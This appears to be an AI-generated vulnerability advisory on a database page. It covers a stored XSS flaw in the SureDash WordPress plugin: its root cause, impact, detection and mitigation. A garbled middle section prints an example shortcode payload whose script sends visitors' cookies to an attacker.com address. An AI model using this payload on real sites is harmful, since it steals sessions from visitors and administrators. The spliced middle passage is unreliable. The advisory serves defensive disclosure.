
Cloud Vulnerability DB
コミュニティ主導の脆弱性データベース
CVE-2026-15821 is a Stored Cross-Site Scripting (XSS) vulnerability in the SureDash – Community, Courses & Member Dashboard plugin for WordPress. It affects all versions up to and including 1.10.0, caused by insufficient input sanitization and output escaping on shortcode attributes. The vulnerability was published on July 24, 2026, and assigned a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically due to insufficient sanitization of shortcode attributes and inadequate output escaping before rendering user-supplied data in web pages. Vulnerable code paths have been identified in core/shortcodes/user-profile.php (lines 64, 85, and 111) and core/blocks/interactivity/build/Profile/view.php (line 23) within the plugin's version 1.10.0 source tree. An authenticated attacker with at minimum contributor-level WordPress access can embed malicious JavaScript payloads within shortcode attributes in posts or pages, which are then stored server-side and executed in the browsers of any user who subsequently visits the affected page (GitHub Advisory, WordPress Trac).
Successful exploitation allows an authenticated contributor (or higher-privileged user) to persistently inject arbitrary JavaScript into WordPress pages, which executes in the browsers of all subsequent visitors — including administrators. This can lead to session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims, defacement, or redirection to malicious sites. While availability is not directly impacted, the changed scope means the injected scripts can affect resources beyond the plugin's own security boundary, including the broader WordPress site and its users (GitHub Advisory, Wordfence).
user-profile.php).[suredash_profile field="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints from contributor-level accounts containing encoded script tags or JavaScript event handlers within shortcode parameters.wp_posts table) containing <script> tags or JavaScript URIs embedded within SureDash shortcode attributes.Site administrators should update the SureDash plugin to a version beyond 1.10.0 as soon as a patched release is available from Brainstorm Force. In the interim, restrict contributor-level and above access to only fully trusted users, and audit existing pages and posts for suspicious shortcode content. If the plugin is not actively required, consider deactivating it until a patched version is released. The patch changeset is tracked at the WordPress plugin repository (WordPress Changeset, Wordfence).
ソース: このレポートは AI を使用して生成されました
無料の脆弱性評価
9つのセキュリティドメインにわたるクラウドセキュリティプラクティスを評価して、リスクレベルをベンチマークし、防御のギャップを特定します。
パーソナライズされたデモを見る
"私が今まで見た中で最高のユーザーエクスペリエンスは、クラウドワークロードを完全に可視化します。"
"Wiz を使えば、クラウド環境で何が起こっているかを 1 つの画面で確認することができます"
"Wizが何かを重要視した場合、それは実際に重要であることを私たちは知っています。"